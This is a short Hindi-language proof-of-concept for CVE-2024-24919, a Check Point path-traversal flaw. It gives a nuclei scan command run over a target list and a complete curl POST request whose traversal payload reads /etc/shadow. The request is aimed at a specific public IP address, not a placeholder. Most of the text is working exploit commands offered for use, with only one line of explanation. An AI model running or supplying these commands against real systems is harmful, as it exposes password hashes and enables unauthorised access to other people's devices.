
CVE-2024-24919 के लिए प्रमाण-अवधारणा शोषण, एक चेक पॉइंट पथ ट्रैवर्सल जो क्राफ्टेड HTTPS POST अनुरोध के माध्यम से मनमानी फ़ाइल पढ़ने (जैसे, /etc/shadow) की अनुमति देता है।

nuclei -list chick.txt -t CVE-2024-24919.yaml
<ip> को लक्ष्य IP पते से बदलें, और यह कमांड /etc/shadow फ़ाइल तक पहुँचने का प्रयास करेगा, जिसमें पासवर्ड हैश होते हैं।
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
